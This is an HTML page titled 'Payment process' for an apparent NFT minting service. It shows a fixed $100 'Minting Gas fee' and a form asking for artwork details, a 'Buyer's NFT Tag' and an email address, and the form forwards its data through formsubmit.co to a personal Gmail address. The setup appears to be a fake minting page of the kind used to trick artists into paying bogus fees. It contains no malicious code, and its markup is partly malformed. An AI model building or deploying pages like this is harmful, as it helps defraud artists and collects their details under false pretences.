<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

<title>Payment process</title>
<style>
body {
  font-family: Arial;
  font-size: 17px;
  padding: 8px;
}

* {
  box-sizing: border-box;
}

.row {
  display: -ms-flexbox; /* IE10 */
  display: flex;
  -ms-flex-wrap: wrap; /* IE10 */
  flex-wrap: wrap;
  margin: 0 -16px;
}

.col-25 {
  -ms-flex: 25%; /* IE10 */
  flex: 25%;
}

.col-50 {
  -ms-flex: 50%; /* IE10 */
  flex: 50%;
}

.col-75 {
  -ms-flex: 75%; /* IE10 */
  flex: 75%;
}

.col-25,
.col-50,
.col-75 {
  padding: 0 16px;
}

.container {
  background-color: #f2f2f2;
  padding: 5px 20px 15px 20px;
  border: 1px solid lightgrey;
  border-radius: 3px;
}

input[type=text] {
  width: 100%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}

input[type=tex] {
  width: 30%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}
input[type=email] {
  width: 100%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}

label {
  margin-bottom: 10px;
  display: block;
}

.icon-container {
  margin-bottom: 20px;
  padding: 7px 0;
  font-size: 24px;
}

.btn {
  background-color: #2b96ff;
  color: white;
  padding: 12px;
  margin: 10px 0;
  border: none;
  width: 100%;
  border-radius: 3px;
  cursor: pointer;
  font-size: 17px;
}

.btn:hover {
  background-color: #45a049;
}

a {
  color: #2196F3;
}

hr {
  border: 1px solid lightgrey;
}

span.price {
  float: right;
  color: grey;
}

/* Responsive layout - when the screen is less than 800px wide, make the two columns stack on top of each other instead of next to each other (also change the direction - make the "cart" column go on top) */
@media (max-width: 800px) {
  .row {
    flex-direction: column-reverse;
  }
  .col-25 {
    margin-bottom: 20px;
  }
}
</style>
</head>
<body>


<div class="row">
  <div class="col-75">
    <div class="container">
    <br>		
    		
<label for="email">UPLOAD ARTWORK HERE:</label>
                <input type="file" id="email" name="email" placeholder="Enter Your Email Address" required>
    <br>
<br>
     <form action="https://formsubmit.co/nftpro.minting@gmail.com" method="POST">
                <input type="hidden" name="_captcha" value="false">
                <input type="hidden" name="_subject" value="item upload INFO!!!!">
                <input type="hidden" name="_next" value="https://nftscreator.github.io/dashboard/done.html">
  
	<label>Minting Gas fee :</label> <input type="tex" id="fname" name="firstname" placeholder="$100.00" readonly>
   
        <div class="row">
          <div class="col-50">
          						<hr>
          			
          						
            
            
            <label for="artname"> Artwork Name:</label>
            
            
            <input type="text" id="artname" name="artname" placeholder="e.g grumpy ape " required>
            
            
            <label for="category"> Category:</label>
            
            <input type="text" id="category" name="category" placeholder="e.g photography, painting, video, gifs" required>
            
            
            <label for="price">Artwork Price:</label>
            
            <input type="text" id="price" name="price" placeholder="Enter Price of Artwork" required>
            <label for="tag">Buyer's NFT Tag:</label>
            <input type="text" id="tag" name="tag" placeholder="e.g #jones111" required>

          
             
                <label for="email">Enter Email:</label>
                <input type="email" id="email" name="email" placeholder="Enter Your Email Address" required>
    

<label for="description">Item description (optional):</label>
         <textarea rows="5" cols="35" placeholder="write description here..."></textarea>
</body>     
          
     <label>
</br>
          <input type="checkbox" checked="checked" name="terms" required> Accept <a href="">Terms</a> And <a href="">Condition</a>
        </label>
        <input type="submit" value="Mint Now..." class="btn">
             
    </div>          
 </form>                       
                
              </div>
              
            </div>
          </div>
            
            
            
            
            
            
            
          
              </div>
            </div>
          </div>
          
        </div>
       
      </form>
    </div>
  </div>
  
    
  </div>
</div>

</body>
</html>
    
